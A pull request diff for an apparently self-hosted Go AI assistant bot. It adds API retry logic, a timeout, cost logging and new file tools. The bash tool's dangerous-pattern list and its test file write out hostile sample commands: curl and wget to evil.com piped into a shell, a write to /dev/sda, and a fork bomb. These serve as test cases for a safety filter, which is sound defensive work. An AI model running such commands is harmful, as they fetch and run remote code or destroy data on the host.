### PR TITLE
feat: add retry/timeout/cost logging and file tools

### DIFF
--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -19,9 +19,9 @@ Guiding principles:
 
 A single transient error or stuck call should not kill a conversation.
 
-- [ ] **Retry with exponential backoff** -- On 429/5xx, retry up to 3 times with backoff. Parse `Retry-After` for 429s. Thread `context.Context` through the HTTP layer so retries are cancellable.
-- [ ] **Top-level timeout on Chat()** -- Wrap the chat loop in a 5-minute deadline. Prevents a stuck API call or infinite tool loop from hanging the bot.
-- [ ] **Cost-per-message logging** -- Extend `logger.Done()` to include estimated cost (e.g., `1.2s · 1,340 tokens · $0.002`). Already have `estimateCost()`, just needs wiring.
+- [x] **Retry with exponential backoff** -- On 429/5xx, retry up to 3 times with backoff. Parse `Retry-After` for 429s. Thread `context.Context` through the HTTP layer so retries are cancellable.
+- [x] **Top-level timeout on Chat()** -- Wrap the chat loop in a 5-minute deadline. Prevents a stuck API call or infinite tool loop from hanging the bot.
+- [x] **Cost-per-message logging** -- Extend `logger.Done()` to include estimated cost (e.g., `1.2s · 1,340 tokens · $0.002`). Already have `estimateCost()`, just needs wiring.
 
 ## P2: Streaming
 

--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -23,19 +23,27 @@ A single transient error or stuck call should not kill a conversation.
 - [x] **Top-level timeout on Chat()** -- Wrap the chat loop in a 5-minute deadline. Prevents a stuck API call or infinite tool loop from hanging the bot.
 - [x] **Cost-per-message logging** -- Extend `logger.Done()` to include estimated cost (e.g., `1.2s · 1,340 tokens · $0.002`). Already have `estimateCost()`, just needs wiring.
 
-## P2: Streaming
+## P2: Harness-Level Memory
+
+The agent should learn from corrections and preferences without polluting the system prompt with memory instructions.
+
+- [ ] **Auto-inject memory into system prompt** -- On `Chat()`, read `~/.config/nevinho/memory.md` and append its content to the system prompt as a `[Memory]` block. File missing or empty = no-op. Content gets prompt-cached with the rest of the system prefix.
+- [ ] **Harness-driven memory writes** -- After each assistant reply, the harness scans for correction patterns (e.g. "use X instead of Y", "I prefer X", "don't do X") and appends one-line entries to `memory.md`. The LLM never sees write instructions -- the harness owns the file.
+- [ ] **Memory cap** -- Hard limit of ~500 tokens (~20 entries). Oldest entries rotate out. Keeps the cache-key stable and the prompt lean.
+
+## P3: Streaming
 
 Waiting 20-40s with only a typing indicator provides no feedback. Streaming fixes this.
 
 - [ ] **Streaming responses** -- Use the streaming API endpoint. Edit the Discord message as tokens arrive instead of waiting for the full response.
 
-## P3: Persist Across Restarts
+## P4: Persist Across Restarts
 
 Conversations should survive process restarts and upgrades.
 
 - [ ] **Conversation summaries to disk** -- On trim or shutdown, write a summary to `~/.config/nevinho/summaries/{userID}.md`. On next message from that user, load the summary as context preamble.
 
-## P4: Richer Interactions
+## P5: Richer Interactions
 
 Only after the foundation is solid.
 

--- a/agent/agent.go
+++ b/agent/agent.go
@@ -28,14 +28,17 @@ Tools:
 - bash: Run commands
 - web_search: Search the web
 - web_read: Read a web page
-- file_read: Read files
-- file_write: Write files
+- file_list: List directory contents
+- file_read: Read files (supports offset/limit for large files)
+- file_edit: Edit a file by replacing an exact string (safer than file_write for small changes)
+- file_write: Write an entire file
 
 Guidelines:
 - Act, don't ask. You have full access.
 - Use bash for system tasks, installs, git, and running code.
 - Use web_search then web_read to research topics.
-- Use file_read to examine files before modifying them.
+- Use file_list to explore directories, file_read to examine files before modifying them.
+- Prefer file_edit over file_write for targeted changes.
 - Bash is non-interactive. Always find non-interactive alternatives (e.g. -y, --with-token). If credentials are needed, ask the user to paste them.
 - Be concise. The user reads on a phone.`
 )
@@ -466,7 +469,7 @@ func toolDetail(name string, input json.RawMessage) string {
 		return str("url")
 	case "bash":
 		return str("command")
-	case "file_read", "file_write":
+	case "file_read", "file_write", "file_list", "file_edit":
 		return str("path")
 	default:
 		return ""

--- a/agent/agent.go
+++ b/agent/agent.go
@@ -16,10 +16,11 @@ import (
 )
 
 const (
-	maxTokens  = 4096
-	maxLoops   = 10
+	maxTokens        = 4096
+	maxLoops         = 10
 	maxContextTokens = 30_000
-	maxToolResult = 4000
+	maxToolResult    = 4000
+	chatTimeout      = 5 * time.Minute
 
 	systemPrompt = `You are nevinho, a personal AI assistant running on the user's VPS. The user talks to you from Discord on their phone. They have no terminal access. You are their only way to interact with this machine.
 
@@ -83,7 +84,7 @@ func (a *Agent) Chat(userID, text string) (string, error) {
 	lock.Lock()
 	defer lock.Unlock()
 
-	ctx, cancel := context.WithCancel(context.Background())
+	ctx, cancel := context.WithTimeout(context.Background(), chatTimeout)
 	a.mu.Lock()
 	a.cancelFn[userID] = cancel
 	a.mu.Unlock()
@@ -121,7 +122,7 @@ func (a *Agent) Chat(userID, text string) (string, error) {
 		if ctx.Err() != nil {
 			return "Cancelled.", nil
 		}
-		resp, err := a.llm.Complete(&llm.Request{
+		resp, err := a.llm.Complete(ctx, &llm.Request{
 			SystemPrompt: systemPrompt,
 			Messages:     a.history[userID],
 			Tools:        a.tools.Defs(),
@@ -139,7 +140,7 @@ func (a *Agent) Chat(userID, text string) (string, error) {
 
 		if len(resp.ToolCalls) == 0 {
 			a.addTokens(usage.In, usage.Out)
-			logger.Done(start, usage.In, usage.Out, cacheRead, toolsUsed)
+			logger.Done(start, usage.In, usage.Out, cacheRead, toolsUsed, estimateCost(a.llm.Model(), usage.In, usage.Out))
 			logger.Nevinho(resp.Text)
 			return resp.Text, nil
 		}
@@ -166,7 +167,7 @@ func (a *Agent) Chat(userID, text string) (string, error) {
 			p := a.tools.PendingApproval(userID)
 			reply := approvalMessage(p)
 			a.addTokens(usage.In, usage.Out)
-			logger.Done(start, usage.In, usage.Out, cacheRead, toolsUsed)
+			logger.Done(start, usage.In, usage.Out, cacheRead, toolsUsed, estimateCost(a.llm.Model(), usage.In, usage.Out))
 			logger.Nevinho(reply)
 			return reply, nil
 		}
@@ -174,7 +175,7 @@ func (a *Agent) Chat(userID, text string) (string, error) {
 
 	reply := "I hit my limit on tool calls. Try breaking it into smaller tasks."
 	a.addTokens(usage.In, usage.Out)
-	logger.Done(start, usage.In, usage.Out, cacheRead, toolsUsed)
+	logger.Done(start, usage.In, usage.Out, cacheRead, toolsUsed, estimateCost(a.llm.Model(), usage.In, usage.Out))
 	logger.Nevinho(reply)
 	return reply, nil
 }
@@ -355,7 +356,7 @@ func (a *Agent) summarizeAndPrepend(userID string, evicted []json.RawMessage) {
 	if flat == "" {
 		return
 	}
-	resp, err := a.llm.Complete(&llm.Request{
+	resp, err := a.llm.Complete(context.Background(), &llm.Request{
 		SystemPrompt: "Summarize this conversation excerpt in 2-3 sentences. Focus on what was asked, what was done, and important outcomes.",
 		Messages:     []json.RawMessage{a.llm.FormatUserMessage(flat)},
 		MaxTokens:    200,

--- a/llm/anthropic.go
+++ b/llm/anthropic.go
@@ -1,6 +1,7 @@
 package llm
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"strings"
@@ -24,7 +25,7 @@ func NewAnthropic(apiKey, baseURL, model string) *Anthropic {
 
 func (a *Anthropic) Model() string { return a.model }
 
-func (a *Anthropic) Complete(req *Request) (*Response, error) {
+func (a *Anthropic) Complete(ctx context.Context, req *Request) (*Response, error) {
 	tools := a.formatTools(req.Tools)
 	// Mark last tool with cache_control so the entire prefix (system + tools) is cached
 	if len(tools) > 0 {
@@ -45,7 +46,7 @@ func (a *Anthropic) Complete(req *Request) (*Response, error) {
 		"tools":    tools,
 	}
 
-	data, err := doHTTP(a.baseURL+"/v1/messages", body, map[string]string{
+	data, err := doHTTP(ctx, a.baseURL+"/v1/messages", body, map[string]string{
 		"x-api-key":         a.apiKey,
 		"anthropic-version": "2023-06-01",
 		"content-type":      "application/json",

--- a/llm/http.go
+++ b/llm/http.go
@@ -2,43 +2,99 @@ package llm
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"net/http"
+	"strconv"
+	"time"
+
+	"github.com/lucasnevespereira/nevinho/logger"
 )
 
-func doHTTP(url string, body interface{}, headers map[string]string) ([]byte, error) {
+const maxRetries = 3
+
+func doHTTP(ctx context.Context, url string, body interface{}, headers map[string]string) ([]byte, error) {
 	jsonBody, err := json.Marshal(body)
 	if err != nil {
 		return nil, err
 	}
 
-	req, err := http.NewRequest("POST", url, bytes.NewReader(jsonBody))
-	if err != nil {
-		return nil, err
-	}
+	var lastErr error
+	for attempt := range maxRetries {
+		req, err := http.NewRequestWithContext(ctx, "POST", url, bytes.NewReader(jsonBody))
+		if err != nil {
+			return nil, err
+		}
+		for k, v := range headers {
+			req.Header.Set(k, v)
+		}
 
-	for k, v := range headers {
-		req.Header.Set(k, v)
-	}
+		resp, err := http.DefaultClient.Do(req)
+		if err != nil {
+			lastErr = err
+			if ctx.Err() != nil {
+				return nil, ctx.Err()
+			}
+			if attempt < maxRetries-1 {
+				logger.Info(fmt.Sprintf("retry %d/%d: %v", attempt+1, maxRetries-1, err))
+				if !sleepWithContext(ctx, backoffDelay(attempt)) {
+					return nil, ctx.Err()
+				}
+			}
+			continue
+		}
 
-	resp, err := http.DefaultClient.Do(req)
-	if err != nil {
-		return nil, err
-	}
-	defer resp.Body.Close()
+		respBody, err := io.ReadAll(resp.Body)
+		resp.Body.Close()
+		if err != nil {
+			return nil, err
+		}
 
-	respBody, err := io.ReadAll(resp.Body)
-	if err != nil {
-		return nil, err
-	}
+		if resp.StatusCode == 200 {
+			return respBody, nil
+		}
 
-	if resp.StatusCode != 200 {
-		return nil, fmt.Errorf("API %d: %s", resp.StatusCode, string(respBody))
-	}
+		lastErr = fmt.Errorf("API %d: %s", resp.StatusCode, string(respBody))
 
-	return respBody, nil
+		if !isRetryable(resp.StatusCode) || attempt == maxRetries-1 {
+			return nil, lastErr
+		}
+
+		delay := backoffDelay(attempt)
+		if resp.StatusCode == 429 {
+			if ra := resp.Header.Get("Retry-After"); ra != "" {
+				if secs, err := strconv.Atoi(ra); err == nil && secs > 0 && secs <= 60 {
+					delay = time.Duration(secs) * time.Second
+				}
+			}
+		}
+		logger.Info(fmt.Sprintf("retry %d/%d: API %d", attempt+1, maxRetries-1, resp.StatusCode))
+		if !sleepWithContext(ctx, delay) {
+			return nil, ctx.Err()
+		}
+	}
+	return nil, lastErr
+}
+
+func isRetryable(code int) bool {
+	return code == 429 || code >= 500
+}
+
+func backoffDelay(attempt int) time.Duration {
+	return time.Duration(1<<attempt) * time.Second
+}
+
+func sleepWithContext(ctx context.Context, d time.Duration) bool {
+	t := time.NewTimer(d)
+	defer t.Stop()
+	select {
+	case <-ctx.Done():
+		return false
+	case <-t.C:
+		return true
+	}
 }
 
 func ensureSlice(msgs []json.RawMessage) []json.RawMessage {

--- a/llm/http_test.go
+++ b/llm/http_test.go
@@ -1,0 +1,64 @@
+package llm
+
+import (
+	"context"
+	"testing"
+	"time"
+)
+
+func TestIsRetryable(t *testing.T) {
+	tests := []struct {
+		code int
+		want bool
+	}{
+		{429, true},
+		{500, true},
+		{502, true},
+		{503, true},
+		{529, true},
+		{400, false},
+		{401, false},
+		{402, false},
+		{404, false},
+		{200, false},
+	}
+
+	for _, tt := range tests {
+		if got := isRetryable(tt.code); got != tt.want {
+			t.Errorf("isRetryable(%d) = %v, want %v", tt.code, got, tt.want)
+		}
+	}
+}
+
+func TestBackoffDelay(t *testing.T) {
+	tests := []struct {
+		attempt int
+		want    time.Duration
+	}{
+		{0, 1 * time.Second},
+		{1, 2 * time.Second},
+		{2, 4 * time.Second},
+	}
+
+	for _, tt := range tests {
+		if got := backoffDelay(tt.attempt); got != tt.want {
+			t.Errorf("backoffDelay(%d) = %v, want %v", tt.attempt, got, tt.want)
+		}
+	}
+}
+
+func TestSleepWithContext_Cancellation(t *testing.T) {
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel()
+
+	start := time.Now()
+	ok := sleepWithContext(ctx, 10*time.Second)
+	elapsed := time.Since(start)
+
+	if ok {
+		t.Error("expected false for cancelled context")
+	}
+	if elapsed > 100*time.Millisecond {
+		t.Errorf("took %v, should return immediately on cancelled context", elapsed)
+	}
+}

--- a/llm/openai.go
+++ b/llm/openai.go
@@ -1,6 +1,7 @@
 package llm
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 )
@@ -23,7 +24,7 @@ func NewOpenAI(apiKey, baseURL, model string) *OpenAI {
 
 func (o *OpenAI) Model() string { return o.model }
 
-func (o *OpenAI) Complete(req *Request) (*Response, error) {
+func (o *OpenAI) Complete(ctx context.Context, req *Request) (*Response, error) {
 	sysMsg, _ := json.Marshal(map[string]interface{}{
 		"role": "system", "content": req.SystemPrompt,
 	})
@@ -36,7 +37,7 @@ func (o *OpenAI) Complete(req *Request) (*Response, error) {
 		"tools":      o.formatTools(req.Tools),
 	}
 
-	data, err := doHTTP(o.baseURL+"/v1/chat/completions", body, map[string]string{
+	data, err := doHTTP(ctx, o.baseURL+"/v1/chat/completions", body, map[string]string{
 		"Authorization": "Bearer " + o.apiKey,
 		"Content-Type":  "application/json",
 	})

--- a/llm/provider.go
+++ b/llm/provider.go
@@ -1,9 +1,12 @@
 package llm
 
-import "encoding/json"
+import (
+	"context"
+	"encoding/json"
+)
 
 type Provider interface {
-	Complete(req *Request) (*Response, error)
+	Complete(ctx context.Context, req *Request) (*Response, error)
 	FormatUserMessage(text string) json.RawMessage
 	FormatToolResults(results []ToolResult) []json.RawMessage
 	Model() string

--- a/logger/logger.go
+++ b/logger/logger.go
@@ -31,11 +31,14 @@ func Tool(name, detail string) {
 func Err(err error)       { log.Printf("%sfail%s     %v", red, reset, err) }
 func Info(msg string)     { log.Printf("%s%s%s", dim, msg, reset) }
 
-func Done(start time.Time, tokensIn, tokensOut, cacheRead int, tools []string) {
+func Done(start time.Time, tokensIn, tokensOut, cacheRead int, tools []string, cost float64) {
 	secs := time.Since(start).Seconds()
 	msg := fmt.Sprintf("%.1fs · %d in / %d out", secs, tokensIn, tokensOut)
 	if cacheRead > 0 {
 		msg += fmt.Sprintf(" · %d cached", cacheRead)
+	}
+	if cost > 0 {
+		msg += fmt.Sprintf(" · $%.4f", cost)
 	}
 	if len(tools) > 0 {
 		msg += " · " + strings.Join(tools, ", ")

--- a/tools/bash.go
+++ b/tools/bash.go
@@ -40,6 +40,7 @@ var dangerousPatterns = []*regexp.Regexp{
 	regexp.MustCompile(`\bcurl\b.*\|`),
 	regexp.MustCompile(`\bwget\b.*\|`),
 	regexp.MustCompile(`\bcurl\b.*-[oO]`),
+	regexp.MustCompile(`\bcurl\b.*--output`),
 
 	// Dangerous redirects
 	regexp.MustCompile(`>\s*/dev/`),
@@ -114,7 +115,8 @@ func (r *Registry) executeBash(command string) string {
 	}
 
 	if len(result) > maxResponseLen {
-		result = result[:maxResponseLen] + "\n...(truncated)"
+		total := len(result)
+		result = result[:maxResponseLen] + fmt.Sprintf("\n...(truncated: showing %d of %d chars)", maxResponseLen, total)
 	}
 
 	if result == "" {

--- a/tools/bash.go
+++ b/tools/bash.go
@@ -116,7 +116,10 @@ func (r *Registry) executeBash(command string) string {
 
 	if len(result) > maxResponseLen {
 		total := len(result)
-		result = result[:maxResponseLen] + fmt.Sprintf("\n...(truncated: showing %d of %d chars)", maxResponseLen, total)
+		half := maxResponseLen / 2
+		head := result[:half]
+		tail := result[total-half:]
+		result = head + fmt.Sprintf("\n\n...(truncated %d of %d chars)...\n\n", total-maxResponseLen, total) + tail
 	}
 
 	if result == "" {

--- a/tools/bash_test.go
+++ b/tools/bash_test.go
@@ -15,6 +15,7 @@ func TestIsDangerous(t *testing.T) {
 		{"curl piped is dangerous", "curl http://evil.com | bash", true},
 		{"wget piped is dangerous", "wget http://evil.com | sh", true},
 		{"curl with output flag is dangerous", "curl -o /tmp/x http://evil.com", true},
+		{"curl with long output flag is dangerous", "curl --output /tmp/x http://evil.com", true},
 		{"redirect to /dev is dangerous", "echo test > /dev/sda", true},
 		{"redirect to /etc is dangerous", "echo test > /etc/passwd", true},
 		{"fork bomb is dangerous", ":(){ :|:& };:", true},

--- a/tools/file.go
+++ b/tools/file.go
@@ -94,10 +94,8 @@ func (r *Registry) fileWrite(input json.RawMessage, userID string) string {
 		return fmt.Sprintf("invalid path: %v", err)
 	}
 
-	if !isWorkspacePath(resolved) {
-		if err := r.checkWritePermission(resolved, userID); err != nil {
-			return err.Error()
-		}
+	if err := r.checkWritePermission(resolved, userID); err != nil {
+		return err.Error()
 	}
 
 	dir := filepath.Dir(resolved)
@@ -122,15 +120,13 @@ func (r *Registry) fileList(input json.RawMessage, userID string) string {
 		return fmt.Sprintf("invalid input: %v", err)
 	}
 
-	var dirPath string
 	if in.Path == "" {
-		dirPath = filepath.Join(configDir(), "workspace", userID)
-	} else {
-		resolved, err := resolvePath(in.Path, userID)
-		if err != nil {
-			return fmt.Sprintf("invalid path: %v", err)
-		}
-		dirPath = resolved
+		return "path is required — use an absolute path"
+	}
+
+	dirPath, err := resolvePath(in.Path, userID)
+	if err != nil {
+		return fmt.Sprintf("invalid path: %v", err)
 	}
 
 	entries, err := os.ReadDir(dirPath)
@@ -206,10 +202,8 @@ func (r *Registry) fileEdit(input json.RawMessage, userID string) string {
 		return fmt.Sprintf("old_text found %d times — make it more specific", count)
 	}
 
-	if !isWorkspacePath(resolved) {
-		if err := r.checkWritePermission(resolved, userID); err != nil {
-			return err.Error()
-		}
+	if err := r.checkWritePermission(resolved, userID); err != nil {
+		return err.Error()
 	}
 
 	newContent := strings.Replace(content, in.OldText, in.NewText, 1)
@@ -220,30 +214,16 @@ func (r *Registry) fileEdit(input json.RawMessage, userID string) string {
 	return fmt.Sprintf("edited %s", in.Path)
 }
 
-func resolvePath(path, userID string) (string, error) {
+func resolvePath(path, _ string) (string, error) {
 	if strings.HasPrefix(path, "~/") {
-		resolved, err := expandHome(path)
-		if err != nil {
-			return "", err
-		}
-		return resolved, nil
+		return expandHome(path)
 	}
 
 	if filepath.IsAbs(path) {
 		return filepath.Clean(path), nil
 	}
 
-	// Relative paths go to per-user workspace
-	base := filepath.Join(configDir(), "workspace", userID)
-	full := filepath.Join(base, filepath.Clean(path))
-
-	absBase, _ := filepath.Abs(base)
-	absFull, _ := filepath.Abs(full)
-	if !strings.HasPrefix(absFull, absBase) {
-		return "", fmt.Errorf("path traversal blocked")
-	}
-
-	return full, nil
+	return "", fmt.Errorf("relative paths are not supported — use an absolute path")
 }
 
 func expandHome(path string) (string, error) {
@@ -255,12 +235,6 @@ func expandHome(path string) (string, error) {
 		return filepath.Join(home, path[2:]), nil
 	}
 	return filepath.Clean(path), nil
-}
-
-func isWorkspacePath(path string) bool {
-	abs, _ := filepath.Abs(path)
-	wsAbs, _ := filepath.Abs(filepath.Join(configDir(), "workspace"))
-	return strings.HasPrefix(abs, wsAbs)
 }
 
 func shortenHome(path string) string {

--- a/tools/file.go
+++ b/tools/file.go
@@ -11,7 +11,9 @@ import (
 const maxFileSize = 100 * 1024 // 100KB
 
 type fileReadInput struct {
-	Path string `json:"path"`
+	Path   string `json:"path"`
+	Offset int    `json:"offset"` // 1-indexed line to start from
+	Limit  int    `json:"limit"`  // max lines to return
 }
 
 func (r *Registry) fileRead(input json.RawMessage, userID string) string {
@@ -34,8 +36,39 @@ func (r *Registry) fileRead(input json.RawMessage, userID string) string {
 	}
 
 	content := string(data)
+
+	// Paginated read: offset/limit work on lines.
+	if in.Offset > 0 || in.Limit > 0 {
+		lines := strings.Split(content, "\n")
+		total := len(lines)
+
+		start := 0
+		if in.Offset > 0 {
+			start = in.Offset - 1
+		}
+		if start >= total {
+			return fmt.Sprintf("offset %d exceeds file length (%d lines)", in.Offset, total)
+		}
+
+		end := total
+		if in.Limit > 0 && start+in.Limit < total {
+			end = start + in.Limit
+		}
+
+		chunk := strings.Join(lines[start:end], "\n")
+		header := fmt.Sprintf("(lines %d–%d of %d)\n", start+1, end, total)
+		return header + chunk
+	}
+
+	// Full read with truncation.
 	if len(content) > maxResponseLen {
-		content = content[:maxResponseLen] + "\n...(truncated)"
+		truncated := content[:maxResponseLen]
+		if idx := strings.LastIndex(truncated, "\n"); idx != -1 {
+			truncated = truncated[:idx]
+		}
+		totalLines := strings.Count(content, "\n") + 1
+		shownLines := strings.Count(truncated, "\n") + 1
+		return truncated + fmt.Sprintf("\n...(truncated: showing %d of %d lines — use offset/limit to read more)", shownLines, totalLines)
 	}
 
 	return content
@@ -77,6 +110,114 @@ func (r *Registry) fileWrite(input json.RawMessage, userID string) string {
 	}
 
 	return fmt.Sprintf("saved to %s", in.Path)
+}
+
+type fileListInput struct {
+	Path string `json:"path"`
+}
+
+func (r *Registry) fileList(input json.RawMessage, userID string) string {
+	var in fileListInput
+	if err := json.Unmarshal(input, &in); err != nil {
+		return fmt.Sprintf("invalid input: %v", err)
+	}
+
+	var dirPath string
+	if in.Path == "" {
+		dirPath = filepath.Join(configDir(), "workspace", userID)
+	} else {
+		resolved, err := resolvePath(in.Path, userID)
+		if err != nil {
+			return fmt.Sprintf("invalid path: %v", err)
+		}
+		dirPath = resolved
+	}
+
+	entries, err := os.ReadDir(dirPath)
+	if err != nil {
+		return fmt.Sprintf("failed to list: %v", err)
+	}
+
+	if len(entries) == 0 {
+		return fmt.Sprintf("%s (empty)", shortenHome(dirPath))
+	}
+
+	var sb strings.Builder
+	fmt.Fprintf(&sb, "%s\n", shortenHome(dirPath))
+	for _, e := range entries {
+		if e.IsDir() {
+			fmt.Fprintf(&sb, "  %s/\n", e.Name())
+		} else {
+			info, _ := e.Info()
+			if info != nil {
+				fmt.Fprintf(&sb, "  %s (%s)\n", e.Name(), formatSize(info.Size()))
+			} else {
+				fmt.Fprintf(&sb, "  %s\n", e.Name())
+			}
+		}
+	}
+	return strings.TrimRight(sb.String(), "\n")
+}
+
+func formatSize(b int64) string {
+	switch {
+	case b < 1024:
+		return fmt.Sprintf("%dB", b)
+	case b < 1024*1024:
+		return fmt.Sprintf("%.1fKB", float64(b)/1024)
+	default:
+		return fmt.Sprintf("%.1fMB", float64(b)/(1024*1024))
+	}
+}
+
+type fileEditInput struct {
+	Path    string `json:"path"`
+	OldText string `json:"old_text"`
+	NewText string `json:"new_text"`
+}
+
+func (r *Registry) fileEdit(input json.RawMessage, userID string) string {
+	var in fileEditInput
+	if err := json.Unmarshal(input, &in); err != nil {
+		return fmt.Sprintf("invalid input: %v", err)
+	}
+
+	resolved, err := resolvePath(in.Path, userID)
+	if err != nil {
+		return fmt.Sprintf("invalid path: %v", err)
+	}
+
+	data, err := os.ReadFile(resolved)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return fmt.Sprintf("file not found: %s", in.Path)
+		}
+		return fmt.Sprintf("failed to read: %v", err)
+	}
+
+	content := string(data)
+	count := strings.Count(content, in.OldText)
+	switch count {
+	case 0:
+		return "old_text not found in file"
+	case 1:
+		// good
+	default:
+		return fmt.Sprintf("old_text found %d times — make it more specific", count)
+	}
+
+	if !isWorkspacePath(resolved) {
+		if err := r.checkWritePermission(resolved, userID); err != nil {
+			return err.Error()
+		}
+	}
+
+	newContent := strings.Replace(content, in.OldText, in.NewText, 1)
+	if err := os.WriteFile(resolved, []byte(newContent), 0644); err != nil {
+		return fmt.Sprintf("failed to write: %v", err)
+	}
+
+	return fmt.Sprintf("edited %s", in.Path)
 }
 
 func resolvePath(path, userID string) (string, error) {

--- a/tools/file_test.go
+++ b/tools/file_test.go
@@ -1,6 +1,9 @@
 package tools
 
 import (
+	"encoding/json"
+	"fmt"
+	"os"
 	"path/filepath"
 	"strings"
 	"testing"
@@ -59,5 +62,163 @@ func TestIsWorkspacePath(t *testing.T) {
 
 	if isWorkspacePath("/etc/passwd") {
 		t.Error("expected /etc/passwd to NOT be a workspace path")
+	}
+}
+
+// newTestRegistry creates a Registry backed by a temp directory.
+func newTestRegistry(t *testing.T) (*Registry, string) {
+	t.Helper()
+	dir := t.TempDir()
+	r := &Registry{
+		approved: make(map[string]bool),
+		pending:  make(map[string]*Pending),
+		permFile: filepath.Join(dir, "approved_paths.json"),
+	}
+	// Pre-approve the temp dir so writes don't block on approval.
+	r.approved[dir] = true
+	return r, dir
+}
+
+func marshalInput(t *testing.T, v any) json.RawMessage {
+	t.Helper()
+	b, err := json.Marshal(v)
+	if err != nil {
+		t.Fatalf("marshal: %v", err)
+	}
+	return b
+}
+
+func TestFileReadPagination(t *testing.T) {
+	r, dir := newTestRegistry(t)
+
+	// Write a file with 10 numbered lines.
+	var lines []string
+	for i := 1; i <= 10; i++ {
+		lines = append(lines, fmt.Sprintf("line %d", i))
+	}
+	path := filepath.Join(dir, "test.txt")
+	if err := os.WriteFile(path, []byte(strings.Join(lines, "\n")), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	tests := []struct {
+		name     string
+		offset   int
+		limit    int
+		contains string
+		excludes string
+	}{
+		{"full read", 0, 0, "line 1", ""},
+		{"offset only", 5, 0, "line 5", "line 4"},
+		{"limit only", 0, 3, "line 1", "line 4"},
+		{"offset and limit", 3, 2, "line 3", "line 1"},
+		{"offset beyond end", 99, 0, "offset 99 exceeds", ""},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			input := marshalInput(t, map[string]any{
+				"path":   path,
+				"offset": tt.offset,
+				"limit":  tt.limit,
+			})
+			got := r.fileRead(input, "u1")
+			if !strings.Contains(got, tt.contains) {
+				t.Errorf("missing %q\ngot: %s", tt.contains, got)
+			}
+			if tt.excludes != "" && strings.Contains(got, tt.excludes) {
+				t.Errorf("should not contain %q\ngot: %s", tt.excludes, got)
+			}
+		})
+	}
+}
+
+func TestFileList(t *testing.T) {
+	r, dir := newTestRegistry(t)
+
+	// Create a sub-dir and a file inside the temp dir.
+	if err := os.Mkdir(filepath.Join(dir, "subdir"), 0755); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(dir, "hello.txt"), []byte("hi"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	input := marshalInput(t, map[string]string{"path": dir})
+	got := r.fileList(input, "u1")
+
+	if !strings.Contains(got, "subdir/") {
+		t.Errorf("expected directory entry 'subdir/'\ngot: %s", got)
+	}
+	if !strings.Contains(got, "hello.txt") {
+		t.Errorf("expected file entry 'hello.txt'\ngot: %s", got)
+	}
+}
+
+func TestFileEdit(t *testing.T) {
+	r, dir := newTestRegistry(t)
+	path := filepath.Join(dir, "edit_me.txt")
+
+	initial := "hello world\nfoo bar\n"
+	if err := os.WriteFile(path, []byte(initial), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	t.Run("successful edit", func(t *testing.T) {
+		input := marshalInput(t, map[string]string{
+			"path":     path,
+			"old_text": "foo bar",
+			"new_text": "baz qux",
+		})
+		got := r.fileEdit(input, "u1")
+		if !strings.Contains(got, "edited") {
+			t.Errorf("expected success message, got: %s", got)
+		}
+		data, _ := os.ReadFile(path)
+		if !strings.Contains(string(data), "baz qux") {
+			t.Errorf("file content not updated: %s", string(data))
+		}
+	})
+
+	t.Run("old_text not found", func(t *testing.T) {
+		input := marshalInput(t, map[string]string{
+			"path":     path,
+			"old_text": "does not exist",
+			"new_text": "replacement",
+		})
+		got := r.fileEdit(input, "u1")
+		if !strings.Contains(got, "not found") {
+			t.Errorf("expected 'not found', got: %s", got)
+		}
+	})
+
+	t.Run("old_text matches multiple times", func(t *testing.T) {
+		_ = os.WriteFile(path, []byte("x x x"), 0644)
+		input := marshalInput(t, map[string]string{
+			"path":     path,
+			"old_text": "x",
+			"new_text": "y",
+		})
+		got := r.fileEdit(input, "u1")
+		if !strings.Contains(got, "3 times") {
+			t.Errorf("expected ambiguity error, got: %s", got)
+		}
+	})
+}
+
+func TestFormatSize(t *testing.T) {
+	tests := []struct {
+		bytes int64
+		want  string
+	}{
+		{500, "500B"},
+		{1536, "1.5KB"},
+		{2 * 1024 * 1024, "2.0MB"},
+	}
+	for _, tt := range tests {
+		got := formatSize(tt.bytes)
+		if got != tt.want {
+			t.Errorf("formatSize(%d) = %q, want %q", tt.bytes, got, tt.want)
+		}
 	}
 }

--- a/tools/file_test.go
+++ b/tools/file_test.go
@@ -13,18 +13,17 @@ func TestResolvePath(t *testing.T) {
 	tests := []struct {
 		name    string
 		path    string
-		userID  string
 		wantErr string
 	}{
-		{"absolute path stays absolute", "/tmp/foo.txt", "u1", ""},
-		{"home expansion works", "~/test.txt", "u1", ""},
-		{"relative path goes to workspace", "notes.txt", "u1", ""},
-		{"path traversal is blocked", "../../etc/passwd", "u1", "traversal"},
+		{"absolute path stays absolute", "/tmp/foo.txt", ""},
+		{"home expansion works", "~/test.txt", ""},
+		{"relative path rejected", "notes.txt", "relative paths are not supported"},
+		{"dot-dot path rejected", "../../etc/passwd", "relative paths are not supported"},
 	}
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			resolved, err := resolvePath(tt.path, tt.userID)
+			resolved, err := resolvePath(tt.path, "u1")
 
 			if tt.wantErr != "" {
 				if err == nil {
@@ -43,25 +42,7 @@ func TestResolvePath(t *testing.T) {
 			if tt.path == "/tmp/foo.txt" && resolved != "/tmp/foo.txt" {
 				t.Errorf("absolute path changed: got %q", resolved)
 			}
-
-			if !filepath.IsAbs(tt.path) && tt.path != "../../etc/passwd" && !strings.HasPrefix(tt.path, "~/") {
-				wsDir := filepath.Join(configDir(), "workspace", tt.userID)
-				if !strings.HasPrefix(resolved, wsDir) {
-					t.Errorf("relative path %q resolved outside workspace: %q", tt.path, resolved)
-				}
-			}
 		})
-	}
-}
-
-func TestIsWorkspacePath(t *testing.T) {
-	ws := filepath.Join(configDir(), "workspace", "u1", "file.txt")
-	if !isWorkspacePath(ws) {
-		t.Errorf("expected %q to be a workspace path", ws)
-	}
-
-	if isWorkspacePath("/etc/passwd") {
-		t.Error("expected /etc/passwd to NOT be a workspace path")
 	}
 }
 
